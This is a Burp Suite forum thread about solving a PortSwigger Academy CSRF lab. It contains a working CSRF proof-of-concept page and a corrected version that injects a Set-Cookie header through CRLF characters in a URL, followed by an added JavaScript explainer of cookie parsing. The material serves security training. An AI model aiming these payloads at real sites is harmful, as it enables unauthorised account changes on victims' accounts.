Burp Suite User Forum


Lab Solution not working

Dominik | Last updated: Oct 19, 2022 02:57PM UTC

Hi! I'm currently doing the Burp academy and therefore a lot of labs. I'm trying to do the CSRF Duplicated in Cookie-Lab and it seems to be bugged? I tried it on my own and with the solution; when I test it, the email gets changed and it works well. But if I send it to the victim, the lab doesn't get solved. Is there a known problem or am I doing something wrong? I followed the steps from the solution and from a video tutorial (where it worked) exactly. A colleague of mine also looked into it and didn't find a problem with my solution.

Link to the lab: https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie

My solution (csrf html):

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <script>history.pushState('', '', '/')</script>
        <form action="https://ID.web-security-academy.net/my-account/change-email" method="POST">
          <input type="hidden" name="email" value="anything%40web-security-academy.net" />
          <input type="hidden" name="csrf" value="fake" />
          <input type="submit" value="Submit request" />
        </form>
        <img src="https://ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%20SameSite=None" onerror="document.forms[0].submit();"/>
      </body>
    </html>

I also tried a real csrf token (regarding the size and copied one) just in case the "fake" doesn't work (even though it's in the solution).

Thanks for your help!

Michelle, PortSwigger Agent | Last updated: Oct 19, 2022 04:28PM UTC

Thanks for getting in touch to raise this with us. If you add a ; after csrf=fake that should help.

    <img src="https://ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake;%20SameSite=None" onerror="document.forms[0].submit();"/>

Let me know how you get on :)
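
Why the semicolon matters, as an added example that is not part of the forum thread or of PortSwigger's solution: a minimal parser following the RFC 6265 (section 5.2) user-agent algorithm, run on the two injected header values from the posts above. The function names are hypothetical, and the double-submit comparison of the `csrf` cookie against the `csrf` form field is an assumption based on the lab's title.

```javascript
// Added example: Set-Cookie parsing per the RFC 6265 section 5.2 algorithm.
// Everything before the first ';' is the name=value pair; attributes come after.
function parseSetCookie(headerValue) {
  const semi = headerValue.indexOf(';');
  const pair = semi === -1 ? headerValue : headerValue.slice(0, semi);
  const rest = semi === -1 ? '' : headerValue.slice(semi + 1);

  const eq = pair.indexOf('=');
  if (eq === -1) return null;              // no '=': the header is ignored
  const name = pair.slice(0, eq).trim();
  const value = pair.slice(eq + 1).trim(); // inner spaces stay in the value
  if (name === '') return null;

  const attributes = {};
  for (const chunk of rest.split(';')) {
    if (chunk.trim() === '') continue;
    const i = chunk.indexOf('=');
    const key = (i === -1 ? chunk : chunk.slice(0, i)).trim().toLowerCase();
    attributes[key] = i === -1 ? '' : chunk.slice(i + 1).trim();
  }
  return { name, value, attributes };
}

// Assumption: the server accepts the request only when the csrf cookie
// equals the csrf form field (double-submit check).
function doubleSubmitPasses(headerValue, formToken) {
  const cookie = parseSetCookie(headerValue);
  return cookie !== null && cookie.name === 'csrf' && cookie.value === formToken;
}

// The two injected header values from the thread, URL-decoded.
const original = decodeURIComponent('csrf=fake%20SameSite=None');
const corrected = decodeURIComponent('csrf=fake;%20SameSite=None');

console.log(parseSetCookie(original));   // value swallows "SameSite=None"
console.log(parseSetCookie(corrected));  // value "fake", SameSite attribute set
console.log(doubleSubmitPasses(original, 'fake'), doubleSubmitPasses(corrected, 'fake'));
```

Without the `;` the cookie carries no SameSite attribute at all, so the browser applies its default SameSite policy in addition to storing a value that no longer equals the form token.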
